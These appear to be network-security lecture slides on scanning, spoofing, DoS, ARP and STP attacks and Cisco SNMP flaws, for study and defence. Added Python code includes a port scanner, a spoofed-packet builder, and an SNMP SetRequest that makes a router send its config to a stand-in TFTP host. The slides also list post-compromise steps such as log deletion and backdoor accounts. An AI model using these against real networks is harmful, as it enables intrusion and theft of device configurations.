Network Security
Networking and Communications
Nov 21, 2013
Trish Miller


Objectives

Types of Attacks
Attacks on the OSI & TCP/IP Model
Attack Methods
Prevention
Switch Vulnerabilities and Hacking
Cisco Routers
Interesting links


Types of Attacks

Physical Access Attacks
  Wiretapping
  Server Hacking
  Vandalism

Dialog Attacks
  Eavesdropping
  Impersonation
  Message Alteration


Types of Attacks (Cont.)

Social Engineering
  Opening Attachments
  Password Theft
  Information Theft

Penetration Attacks
  Scanning (Probing)
  Break-in
  Denial of Service
  Malware
    Viruses
    Worms

Risk Analysis of the Attack

What is the cost if the attack succeeds?
What is the probability of occurrence?
What is the severity of the threat?
What is the countermeasure cost?
What is the value of the system being protected?
Determine whether the countermeasure should be implemented (its cost should not exceed the expected loss it prevents).
Finally, determine its priority.

OSI & TCP/IP Related Attacks


OSI Model Related Attacks

Application layer:
  Attacks on web servers and web applications
  Attacks are typically delivered as viruses or other malware

Presentation:
  Cracking of encrypted transmissions that are protected by a short encryption key

Session:
  Password theft
  Unauthorized access with root permission

Transport & Network:
  Forged TCP/IP addresses (spoofing)
  DoS attacks

Data Link & Physical:
  Network sniffers
  Wire taps
  Trojan horses
  Malicious code

Attacks Related to TCP Packet

Port Number
  Applications are identified by their port numbers
  Well-known ports (0-1023)
    HTTP=80, Telnet=23, FTP=21 for control (commands), 20 for data transfer, SMTP=25
    On Unix-like systems only the root user may bind a service to these ports, so a process listening there is running, or was started, with root privilege


Attacks Related to TCP Packet (Cont.)

IP address spoofing
  Change the source IP address of outgoing packets
  To conceal the identity of the attacker
  To have the victim think the packet comes from a trusted host
  LAND attack: a SYN whose spoofed source address and port equal the destination address and port, so the victim tries to complete the handshake with itself

Attacks Related to TCP Packet (Cont.)

Port Number
  Registered ports (1024-49151) for any application; 49152-65535 are the dynamic (ephemeral) ports
  Not all operating systems use these port ranges, although all use the well-known ports

Attack Methods

Host Scanning
Network Scanning
Port Scanning
Fingerprinting


Attack Methods (Cont.)

Host Scanning
  Ping a range of IP addresses, or use alternative scanning messages (TCP SYN or ACK probes) where ICMP is blocked
  Identifies victims (live hosts)
  Types of host scanning
    Ping scanning
    TCP SYN/ACK scanning


Attack Methods (Cont.)

Network Scanning
  Discovery of the network infrastructure (switches, routers, subnets, etc.)
  Tracert (traceroute) and similar applications identify the routers along the route to a destination host


Attack Methods (Cont.)

Port Scanning
  Once a host is identified, scan its ports to find out whether it is a server and what type
  Two types:
    Server port scanning
      TCP
      UDP
    Client port scanning
      NetBIOS
      Ports 135-139 (MS RPC and NetBIOS) are used for Windows file and print services
  GRC.com (ShieldsUP!) is a free website that scans your PC for open ports
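The server-side TCP scan described above, written out as an added example (not code from the original slides). It performs a connect() scan, the simplest and noisiest kind, against a throwaway listener on 127.0.0.1 so it runs offline; the listener, the 40-port window around it and the port-to-service labels are constructed for the demo, and on a real engagement the host and range would come from the host-scanning step.

```python
"""TCP connect() port scan with a throwaway loopback listener as the target.

Added example.  The listener is a constructed stand-in for a server; nothing
here touches a remote host.
"""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# Well-known ports named in the slides, used only to label findings.
WELL_KNOWN = {20: "ftp-data", 21: "ftp", 23: "telnet", 25: "smtp", 80: "http",
              135: "msrpc", 137: "netbios-ns", 138: "netbios-dgm", 139: "netbios-ssn"}


def probe(host, port, timeout=0.3):
    """Full three-way handshake via connect(); True if the port accepts connections.

    A connect scan is the noisiest kind: the target completes the handshake and
    can log the connection, which is why attackers prefer half-open SYN scans.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:          # refused (RST), timed out (filtered) or unreachable
            return False


def connect_scan(host, ports, workers=32):
    """Probe the ports concurrently and return the sorted list of open ones."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, probe(host, p)), ports))
    return sorted(p for p, is_open in results if is_open)


def label(port):
    """Service name for a well-known port, otherwise 'unknown'."""
    return WELL_KNOWN.get(port, "unknown")


def start_listener(host="127.0.0.1"):
    """Constructed target: accept-and-close TCP server on an OS-chosen loopback port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(16)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:      # listener closed: stop serving
                break

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def demo():
    """Scan a 40-port window around the listener; returns (listener_port, open_ports)."""
    srv, port = start_listener()
    try:
        found = connect_scan("127.0.0.1", range(port - 20, port + 20))
    finally:
        srv.close()
    return port, found


if __name__ == "__main__":
    listener_port, open_ports = demo()
    for p in open_ports:
        print("%d/tcp open  %s" % (p, label(p)))
```

The timeout is what separates "closed" (immediate RST) from "filtered" (no answer at all): a firewall that silently drops probes makes every closed port cost the full timeout, which is one of the ways a scan gets slowed down and noticed.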


Attack Methods (Cont.)

Fingerprinting
  Discovers the host operating system and applications, as well as their versions
  Active (sends probes and examines the responses)
  Passive (listens to traffic the host sends anyway)
  Nmap performs all major scanning and fingerprinting methods
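One added example serves two of the slides above: the IP-spoofing/LAND slide and the passive-fingerprinting bullet. It is not code from the original deck. It builds IPv4/TCP headers with correct checksums in memory (so a spoofed source, or a LAND packet with source equal to destination, can be constructed without sending anything), parses them the way a filter or IDS would, flags the LAND condition, and makes a coarse passive OS guess from the initial TTL and window size of a SYN. The addresses are from the RFC 5737 test ranges, and the TTL/window table is an assumption of commonly seen defaults, not a full p0f database.

```python
"""Build and parse raw IPv4/TCP headers: spot LAND packets, guess the OS from a SYN.

Added example.  Packets are constructed in memory; nothing is sent on the wire.
"""
import socket
import struct

SYN = 0x02


def checksum(data):
    """RFC 1071 Internet checksum (one's-complement sum of 16-bit words)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_ipv4_tcp(src, dst, sport, dport, flags=SYN, ttl=64, window=65535, df=True):
    """IPv4 header + 20-byte TCP header with valid checksums (no options, no payload).

    Putting anything but the sender's real address in `src` is IP spoofing;
    src == dst with sport == dport is the LAND packet.
    """
    s, d = socket.inet_aton(src), socket.inet_aton(dst)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, window, 0, 0)
    pseudo = struct.pack("!4s4sBBH", s, d, 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234,
                     0x4000 if df else 0, ttl, 6, 0, s, d)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def parse(pkt):
    """Decode the header fields a packet filter or IDS would look at."""
    vihl, _, _, _, frag, ttl, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (vihl & 0x0F) * 4
    if vihl >> 4 != 4 or proto != 6:
        raise ValueError("not an IPv4/TCP packet")
    if checksum(pkt[:ihl]) != 0:          # a header with a valid checksum sums to zero
        raise ValueError("bad IPv4 header checksum")
    sport, dport, _, _, _, flags, window, _, _ = struct.unpack("!HHIIBBHHH", pkt[ihl:ihl + 20])
    return {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst), "ttl": ttl,
            "df": bool(frag & 0x4000), "sport": sport, "dport": dport,
            "flags": flags, "window": window}


def is_land(p):
    """LAND attack: a SYN whose spoofed source equals the destination (address and port)."""
    return p["src"] == p["dst"] and p["sport"] == p["dport"] and bool(p["flags"] & SYN)


def guess_os(p):
    """Passive fingerprint from a SYN's initial TTL and window size.

    Coarse heuristic; the (TTL, window) pairs are assumed common defaults and
    are deliberately incomplete.  Active fingerprinting would send probes instead.
    """
    if not p["flags"] & SYN:
        return "not a SYN"
    initial_ttl = next(t for t in (32, 64, 128, 255) if t >= p["ttl"])
    w = p["window"]
    if initial_ttl == 128 and w in (8192, 64240, 65535):
        return "Windows"
    if initial_ttl == 64 and w in (5840, 14600, 29200, 64240):
        return "Linux"
    if initial_ttl == 64 and w == 65535:
        return "macOS/BSD"
    if initial_ttl == 255:
        return "Solaris or network device"
    return "unknown (initial TTL %d, window %d)" % (initial_ttl, w)


if __name__ == "__main__":
    for pkt in (build_ipv4_tcp("10.0.0.5", "10.0.0.5", 139, 139),
                build_ipv4_tcp("192.0.2.1", "198.51.100.7", 40000, 80, ttl=128, window=8192)):
        p = parse(pkt)
        print(p["src"], "->", p["dst"], "LAND" if is_land(p) else guess_os(p))
```

The defensive side of spoofing follows from the parser: a border filter drops packets arriving on the outside interface whose source is an inside address (and vice versa), and a LAND check is just the src/dst comparison above applied before the stack ever sees the packet.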


Attack Methods (Cont.)

Denial-of-Service (DoS) Attacks
  Attacks on availability
  SYN flooding attacks overload a host or network with connection attempts; each SYN leaves a half-open connection that ties up resources until it times out
  Stopping DoS attacks is very hard.
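An added detection example for the SYN-flood bullet (not from the original slides): it runs over connection-attempt records of the kind a flow exporter or firewall log produces and flags a service that receives SYNs at a high rate from many sources with almost no completed handshakes. The records, addresses, and the rate and completion thresholds are all constructed for the demo and would need tuning against real baselines.

```python
"""Flag SYN floods in a stream of TCP connection records (added example).

Records are constructed here; in practice they come from a flow exporter,
firewall log or packet capture.  A flood shows up as many SYNs to one
service, from many (usually spoofed) sources, with almost no completed
handshakes.
"""
import random
from collections import defaultdict

# Record shape: (timestamp_s, src_ip, dst_ip, dst_port, flags)
# flags: "S" = client SYN (new attempt), "A" = client ACK completing the handshake


def make_sample():
    """Constructed traffic: 20 real web clients, then a 2-second spoofed SYN flood on 192.0.2.10:80."""
    rng = random.Random(7)
    recs = []
    for i in range(40):                                  # normal: every SYN is followed by an ACK
        src = "198.51.100.%d" % (1 + i % 20)
        t = i * 0.1
        recs.append((t, src, "192.0.2.20", 443, "S"))
        recs.append((t + 0.02, src, "192.0.2.20", 443, "A"))
    for i in range(600):                                 # flood: random sources, SYN only, ~300/s
        src = "%d.%d.%d.%d" % tuple(rng.randrange(1, 254) for _ in range(4))
        recs.append((1.0 + i / 300.0, src, "192.0.2.10", 80, "S"))
    recs.sort()
    return recs


def detect_syn_flood(records, min_syn_rate=100.0, max_completion=0.2):
    """Per (dst, dport): SYN rate, handshake completion ratio, distinct sources.

    Alert when SYNs arrive faster than `min_syn_rate` per second and fewer
    than `max_completion` of them were followed by the client's ACK.
    Thresholds are assumptions for the demo.
    """
    stats = defaultdict(lambda: {"syn": 0, "ack": 0, "srcs": set(), "first": None, "last": None})
    for t, src, dst, dport, flags in records:
        s = stats[(dst, dport)]
        if flags == "S":
            s["syn"] += 1
            s["srcs"].add(src)
        elif flags == "A":
            s["ack"] += 1
        s["first"] = t if s["first"] is None else min(s["first"], t)
        s["last"] = t if s["last"] is None else max(s["last"], t)

    alerts = []
    for (dst, dport), s in stats.items():
        if not s["syn"]:
            continue
        duration = max(s["last"] - s["first"], 1e-3)
        rate = s["syn"] / duration
        completion = s["ack"] / s["syn"]
        if rate > min_syn_rate and completion < max_completion:
            alerts.append({"target": (dst, dport), "syn_per_s": round(rate),
                           "completion": completion, "distinct_sources": len(s["srcs"])})
    return sorted(alerts, key=lambda a: -a["syn_per_s"])


if __name__ == "__main__":
    for a in detect_syn_flood(make_sample()):
        print("SYN flood on %s:%d  %d SYN/s, %.0f%% completed, %d sources"
              % (a["target"][0], a["target"][1], a["syn_per_s"],
                 100 * a["completion"], a["distinct_sources"]))
```

The distinct-source count is what tells you blocking by source address will not help: with hundreds of random spoofed sources the workable mitigations are SYN cookies on the host, rate limiting or SYN proxying at the firewall, and upstream filtering, which is why the slide calls stopping DoS "very hard".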


Attack Methods (Cont.)

The Break-In
  Password guessing
  Taking advantage of unpatched vulnerabilities
  Session hijacking


After the Compromise

Download a rootkit via TFTP
Delete audit log files
Create a backdoor account or Trojan backdoor programs
Weaken security
Use the access to steal information or do damage
Install malicious software (RAT, DoS zombie, spam relay, etc.)

Prevention

Stealth Scanning (how attackers evade detection)
Access Control
Firewalls
Proxy Servers
IPsec
Security Policies
DMZ
Host Security


Stealth Scanning

Noisiness of attacks: a fast scan of every port is easy for an IDS to spot
Exposure of the attacker's IP address
Reduce the rate of the scan below the IDS threshold
Scan selected ports only


Access Control

The goal of access control is to prevent attackers from gaining access, and to stop them if they do.
The best way to accomplish this is to:
  Determine who needs access to the resources located on the server.
  Decide the access permissions for each resource.
  Implement specific access control policies for each resource.
  Record mission-critical resources.
  Harden the server against attacks.
  Disable invalid accounts and establish account policies.

Firewalls

Firewalls are designed to protect you from outside attempts to access your computer, whether for the purpose of eavesdropping on your activities, stealing data, sabotage, or using your machine as a means to launch an attack on a third party.

Firewalls (Cont.)

Hardware
  Provides a strong degree of protection from the outside world.
  Can be effective with little or no setup.
  Can protect multiple systems.

Software
  Better suited to protect against Trojans and worms, because it sees which local program is making a connection.
  Allows you to configure the ports you wish to monitor; gives you finer control.
  Protects a single system.

Firewalls (Cont.)

Can prevent
  Discovery
    Network scanning
    Traceroute
  Penetration
    SYN flood
    Garbage (malformed packets)
    UDP ping
    TCP ping
    Ping of Death

Proxy

A proxy server is a buffer between your network and the outside world.
An anonymous proxy hides the client's real IP address from the outside host, which limits what an attacker can learn about your network; it does not by itself block attacks.

IPsec

Provides various security services for traffic at the IP layer
These security services include
  Authentication
  Integrity
  Confidentiality

IPsec overview: how IPsec helps

Problem                                | How IPsec helps                 | Details
Unauthorized system access             | Authentication, tamper-proofing | Defense in depth by isolating trusted from untrusted systems
Targeted attacks on high-value servers | Authentication, tamper-proofing | Locking down servers with IPsec. Examples: HR servers, Outlook Web Access (OWA), DC replication
Eavesdropping                          | Authentication, confidentiality | Defense in depth against password or information gathering by untrusted systems
Government guideline compliance        | Authentication, confidentiality | Example: "All communications between financial servers must be encrypted."

DMZ (diagram slide)


Host Security

Hardening servers
Cisco IOS
Upgrades and patches
Unnecessary services (disable them)
Network monitoring tools

Switch Vulnerabilities and Hacking


CDP Protocol

Cisco Discovery Protocol advertises a device's IP address, IOS version and model to its neighbours, so an attacker on the segment can learn them by listening.
Flooding a switch with large numbers of CDP packets can exhaust its memory and crash it.
Used to troubleshoot the network, but should be disabled on ports that do not need it.


ARP Poisoning

The attacker sends forged ARP replies to poison the ARP cache of an end node, so the victim's traffic for another address is delivered to the attacker.
The destination MAC address determines where a frame is delivered on the LAN; the host's network stack accepts an ARP reply without checking that it answers a request it sent.
A user on the segment can therefore forge ARP datagrams to carry out a man-in-the-middle attack.
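An added example for the ARP poisoning slide (not from the original deck): a small detector that parses Ethernet/ARP frames, keeps its own IP-to-MAC table, and raises the two signals a poisoning attack produces, a reply nobody asked for and a mapping that changes. The frames, addresses and MAC values are constructed for the demo; on a real segment the detector would read from a raw socket or a capture file.

```python
"""ARP cache poisoning detector over raw Ethernet/ARP frames (added example).

Frames are constructed below; on a live network they would come from a raw
socket or pcap.  The detector keeps its own IP -> MAC table and flags replies
nobody asked for and mappings that change.
"""
import socket
import struct

ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, eth_src=None):
    """Ethernet II frame carrying an ARP request (broadcast) or reply (unicast to target)."""
    eth_dst = BROADCAST if op == ARP_REQUEST else target_mac
    eth = mac_bytes(eth_dst) + mac_bytes(eth_src or sender_mac) + b"\x08\x06"
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not ARP."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    _, _, _, _, op, smac, sip, tmac, tip = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"op": op, "eth_src": mac_str(frame[6:12]),
            "sender_mac": mac_str(smac), "sender_ip": socket.inet_ntoa(sip),
            "target_mac": mac_str(tmac), "target_ip": socket.inet_ntoa(tip)}


class ArpWatch:
    """Stateful detector: one instance per LAN segment."""

    def __init__(self):
        self.table = {}        # ip -> mac as learned from traffic (mirrors what victims' caches hold)
        self.pending = set()   # (asker_ip, asked_ip) requests still awaiting a reply
        self.alerts = []

    def _learn(self, ip, mac):
        known = self.table.get(ip)
        if known and known != mac:
            self.alerts.append("changed: %s moved from %s to %s" % (ip, known, mac))
        self.table[ip] = mac

    def feed(self, frame):
        a = parse_arp(frame)
        if a is None:
            return
        if a["eth_src"] != a["sender_mac"]:
            self.alerts.append("mismatch: frame from %s carries ARP sender %s"
                               % (a["eth_src"], a["sender_mac"]))
        if a["op"] == ARP_REQUEST:
            self.pending.add((a["sender_ip"], a["target_ip"]))
        elif a["op"] == ARP_REPLY:
            asked = (a["target_ip"], a["sender_ip"])   # answers "who has sender_ip?" from target_ip
            if asked in self.pending:
                self.pending.discard(asked)
            else:
                self.alerts.append("unsolicited reply: %s claims %s" % (a["sender_mac"], a["sender_ip"]))
        self._learn(a["sender_ip"], a["sender_mac"])


def demo():
    """Constructed scenario: legitimate gateway lookup, then the attacker poisons the victim."""
    victim, victim_mac = "192.168.1.10", "aa:bb:cc:00:00:10"
    gateway, gateway_mac = "192.168.1.1", "02:00:00:00:00:01"
    attacker_mac = "02:00:00:00:00:66"
    w = ArpWatch()
    w.feed(build_arp(ARP_REQUEST, victim_mac, victim, "00:00:00:00:00:00", gateway))
    w.feed(build_arp(ARP_REPLY, gateway_mac, gateway, victim_mac, victim))
    baseline = len(w.alerts)                           # legitimate exchange: expect 0
    # Poison: the attacker tells the victim that the gateway's IP lives at the attacker's MAC
    w.feed(build_arp(ARP_REPLY, attacker_mac, gateway, victim_mac, victim))
    return w, baseline


if __name__ == "__main__":
    watch, _ = demo()
    print("\n".join(watch.alerts))
```

The same two checks are what switch features such as Dynamic ARP Inspection apply in hardware, using the DHCP snooping table as the trusted source of IP-to-MAC bindings instead of learning them from traffic.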


SNMP

SNMP manages the network (reads and writes device configuration and statistics).
Authentication is weak in SNMPv1 and v2c: the "public" (read) and "private" (write) community strings travel in cleartext.
Uses UDP, which is prone to source-address spoofing.
Enable SNMPv3 (with authentication and privacy) without backwards compatibility to v1/v2c.


Spanning Tree Attacks

Standard STP takes 30-45 seconds to deal with a failure or a root bridge change.
Purpose: a Spanning Tree attack lets the attacker review the traffic on the backbone.
Only devices affected by the failure notice the change.
The attacker can create a DoS condition on the network by sending BPDUs from the attacking host (forcing continuous recalculation).

Spanning Tree Attacks (Cont.)

STEP 1: MAC flood the access switch.
STEP 2: Advertise as a priority-zero bridge.
STEP 3: The attacker becomes the root bridge!
  Spanning Tree recalculates.
  The backbone of the original network now runs from the attacking host to the other switches on the network.


STP Attack Prevention

Disabling STP can introduce another attack (bridging loops and broadcast storms).
BPDU Guard
  Error-disables a PortFast port upon detection of a BPDU message on the port.
  Enable on any ports running PortFast (end-host access ports).
Root Guard
  Prevents a port from becoming the root port: if a superior BPDU arrives, the port is placed in a root-inconsistent (blocking) state instead of accepting the new root.
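An added example covering the Spanning Tree attack and prevention slides together (not code from the original deck): it builds the priority-zero Configuration BPDU from STEP 2, parses it, and shows how three ports react, one with PortFast and BPDU Guard, one uplink with Root Guard, and one unguarded port on which the attacker does become root. The bridge MACs, port names and timers are constructed for the demo; the port-state names follow the Cisco terms used on the slides.

```python
"""Parse 802.1D Configuration BPDUs and apply BPDU Guard / Root Guard (added example).

Frames are constructed in memory.  A bridge ID is 8 bytes: a 2-byte priority
followed by the bridge MAC; the numerically lowest ID wins the root election,
which is why a priority of zero is the attacker's choice.
"""
import struct

STP_MULTICAST = bytes.fromhex("0180c2000000")
LLC_STP = b"\x42\x42\x03"
# proto id, version, type, flags, root id, root path cost, bridge id, port id, 4 timers
BPDU_FMT = "!HBBB8sI8sHHHHH"


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def bridge_id(priority, mac):
    """8-byte bridge identifier; compares correctly as raw bytes (big-endian)."""
    return struct.pack("!H", priority) + mac_bytes(mac)


def build_config_bpdu(src_mac, root_id, sender_id, root_cost=0, port_id=0x8001):
    """802.3 frame + LLC + 35-byte Configuration BPDU (timers in 1/256 s units)."""
    bpdu = struct.pack(BPDU_FMT, 0, 0, 0, 0, root_id, root_cost, sender_id, port_id,
                       0, 20 * 256, 2 * 256, 15 * 256)
    eth = STP_MULTICAST + mac_bytes(src_mac) + struct.pack("!H", len(LLC_STP) + len(bpdu))
    return eth + LLC_STP + bpdu


def parse_bpdu(frame):
    """Root/bridge ids and cost of a Configuration BPDU, or None for anything else."""
    if len(frame) < 52 or frame[:6] != STP_MULTICAST or frame[14:17] != LLC_STP:
        return None
    fields = struct.unpack(BPDU_FMT, frame[17:52])
    if fields[2] != 0:                  # type 0x00 = Configuration, 0x80 = Topology Change
        return None
    root, cost, sender = fields[4], fields[5], fields[6]
    return {"root_id": root, "root_priority": struct.unpack("!H", root[:2])[0],
            "root_cost": cost, "bridge_id": sender}


class SwitchPort:
    """One port's view: its guards and the root bridge the switch currently believes in."""

    def __init__(self, name, current_root, portfast=False, bpdu_guard=False, root_guard=False):
        self.name, self.current_root = name, current_root
        self.portfast, self.bpdu_guard, self.root_guard = portfast, bpdu_guard, root_guard
        self.state = "forwarding"

    def receive(self, frame):
        """Apply the guards to an incoming BPDU and return the port's resulting state."""
        b = parse_bpdu(frame)
        if b is None:
            return self.state
        if self.portfast and self.bpdu_guard:
            self.state = "err-disabled"          # BPDU Guard: an end host must never speak STP
        elif b["root_id"] < self.current_root and self.root_guard:
            self.state = "root-inconsistent"     # Root Guard: superior BPDU ignored, port blocks
        elif b["root_id"] < self.current_root:
            self.current_root = b["root_id"]     # unprotected: the attacker becomes root (STEP 3)
            self.state = "forwarding"
        return self.state


def demo():
    """STEP 2 of the slides against three differently configured ports."""
    legit_root = bridge_id(32768, "00:1a:2b:00:00:01")          # default priority
    attacker = bridge_id(0, "de:ad:be:ef:00:01")                # priority zero
    attack_frame = build_config_bpdu("de:ad:be:ef:00:01", attacker, attacker)
    ports = [SwitchPort("access-bpduguard", legit_root, portfast=True, bpdu_guard=True),
             SwitchPort("uplink-rootguard", legit_root, root_guard=True),
             SwitchPort("access-unguarded", legit_root)]
    states = {p.name: p.receive(attack_frame) for p in ports}
    became_root = {p.name: p.current_root == attacker for p in ports}
    return states, became_root


if __name__ == "__main__":
    for name, state in demo()[0].items():
        print("%-18s %s" % (name, state))
```

Only the unguarded port lets the election proceed; that is the port the slides' attacker needs, and it is also the default state of every access port on a switch where neither guard has been enabled.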


CSM and CSM-S

Cisco Content Switching Module (CSM)
Cisco Content Switching Module with SSL (CSM-S)


Cisco Secure Desktop (CSD)

3 major vulnerabilities
  Information from an Internet browsing session is retained after the SSL VPN session ends.
  The system policies that should prevent logoff can be evaded, allowing a VPN connection to be activated.
  Local users can elevate their privileges.

Prevention
  Cisco has software updates to address the vulnerabilities.
  Workarounds are available to mitigate the effects of some of these vulnerabilities.

Cisco Routers

Two potential issues with Cisco routers
  Problems with certain IOS software
  SNMP

Devices running Cisco IOS versions 12.0S, 12.2, 12.3 or 12.4
  Problem with the software: confidential information can be leaked out
  Software updates on the Cisco site fix this problem


Virtual Private Networks (diagram slides: Virtual connection 1, Virtual connection 2; information leak, error, connection)


Cisco uBR10012 series devices automatically enable SNMP read/write access with a default community string.
Since there are no access restrictions on this community string, attackers can exploit this to gain complete control of the device.

Attacking computer -> Cisco router (diagram)
By sending an SNMP set request with a spoofed source IP address, the attacker can make the victim router send him its configuration file.
With this information, the remote computer has complete control over the router.

Fixes
  Software updates available on the Cisco site fix the read/write problem.
  Until patched, restrict the community with an access list or disable SNMP on the device.
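One added example serves both the SNMP slide in the switch section and the uBR10012 scenario above; it is not code from the original deck. It encodes and decodes SNMPv1/v2c messages in BER, so the point of both slides is visible in bytes: the community string is the entire credential and it sits in cleartext in every datagram, and a SetRequest with the default write community is all it takes to drive the device. The sample message asks the router to write its configuration to a TFTP server, as the slide describes; the OID used for that is Cisco's writeNet object as I recall it from OLD-CISCO-SYS-MIB and is an assumption to check against the MIB, and the addresses and community values are constructed.

```python
"""Decode SNMPv1/v2c messages and flag what the slides warn about (added example).

The community string is the whole credential and travels in cleartext, so anyone
who can read the packet (or spoof the UDP source) can reuse it.  The sample
SetRequest is constructed here; parse_snmp() would equally take the payload of a
captured UDP/161 datagram.
"""
PDU_TYPES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse", 0xA3: "SetRequest"}
DEFAULT_COMMUNITIES = {"public", "private"}
# Cisco OLD-CISCO-SYS-MIB writeNet (assumed OID, verify against the MIB): setting
# writeNet.<tftp-server-ip> to a filename makes the router upload its config there.
WRITENET_OID = "1.3.6.1.4.1.9.2.1.55"


def _length(n):
    """BER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b

def tlv(tag, body):
    return bytes([tag]) + _length(len(body)) + body

def enc_int(v):
    """INTEGER, minimal two's-complement encoding."""
    return tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))

def enc_oid(oid):
    """OBJECT IDENTIFIER: first two arcs as 40*a+b, remaining arcs base-128."""
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out += bytes(reversed(chunk))
    return tlv(0x06, bytes(out))

def build_set(community, oid, value, request_id=1):
    """SNMPv1 SetRequest (version INTEGER 0) with one OCTET STRING varbind."""
    varbind = tlv(0x30, enc_oid(oid) + tlv(0x04, value.encode()))
    pdu = tlv(0xA3, enc_int(request_id) + enc_int(0) + enc_int(0) + tlv(0x30, varbind))
    return tlv(0x30, enc_int(0) + tlv(0x04, community.encode()) + pdu)

def read_tlv(buf, i=0):
    """Return (tag, value bytes, index just past the element)."""
    tag, ln, i = buf[i], buf[i + 1], i + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, i = int.from_bytes(buf[i:i + n], "big"), i + n
    return tag, buf[i:i + ln], i + ln

def dec_oid(b):
    arcs, v = [b[0] // 40, b[0] % 40], 0
    for x in b[1:]:
        v = (v << 7) | (x & 0x7F)
        if not x & 0x80:
            arcs.append(v)
            v = 0
    return ".".join(map(str, arcs))

def parse_snmp(payload):
    """Version, community, PDU type, request id and varbinds of a v1/v2c message."""
    tag, msg, _ = read_tlv(payload)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, i = read_tlv(msg)
    _, community, i = read_tlv(msg, i)
    pdu_tag, pdu, _ = read_tlv(msg, i)
    _, rid, j = read_tlv(pdu)
    _, _, j = read_tlv(pdu, j)                  # error-status
    _, _, j = read_tlv(pdu, j)                  # error-index
    _, vbl, _ = read_tlv(pdu, j)
    varbinds, k = [], 0
    while k < len(vbl):
        _, vb, k = read_tlv(vbl, k)
        _, oid, m = read_tlv(vb)
        vtag, val, _ = read_tlv(vb, m)
        varbinds.append((dec_oid(oid), vtag, val))
    version = int.from_bytes(ver, "big", signed=True)
    return {"version": {0: "v1", 1: "v2c"}.get(version, str(version)),
            "community": community.decode("latin-1"),
            "pdu": PDU_TYPES.get(pdu_tag, "0x%02x" % pdu_tag),
            "request_id": int.from_bytes(rid, "big", signed=True), "varbinds": varbinds}

def assess(msg):
    """What a network monitor should report about this message."""
    findings = []
    if msg["version"] in ("v1", "v2c"):
        findings.append("%s: community string %r visible in cleartext" % (msg["version"], msg["community"]))
    if msg["community"] in DEFAULT_COMMUNITIES:
        findings.append("default community string in use")
    if msg["pdu"] == "SetRequest":
        findings.append("write request (SetRequest)")
        if any(oid.startswith(WRITENET_OID + ".") for oid, _, _ in msg["varbinds"]):
            findings.append("writeNet set: router asked to upload its config via TFTP")
    return findings

def demo():
    """The slide's scenario: a SetRequest with the default write community (source address spoofed)."""
    wire = build_set("private", WRITENET_OID + ".192.0.2.99", "victim-confg")
    msg = parse_snmp(wire)
    return msg, assess(msg)

if __name__ == "__main__":
    m, f = demo()
    print(m["version"], m["pdu"], m["community"], m["varbinds"][0][0]); print("\n".join(f))
```

Nothing in the message authenticates the sender beyond the community string, and UDP lets the source address be forged, which is why the slide's attacker can direct the upload to a TFTP server of his choosing. SNMPv3 replaces the community with a user, a keyed MAC and optional encryption, so the same parser would see a v3 header and no reusable secret.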

Links

http://sectools.org/tools2.html
http://insecure.org/sploits/l0phtcrack.lanman.problems.html
http://www.grc.com/intro.htm
http://www.riskythinking.com
http://www.hidemyass.com/
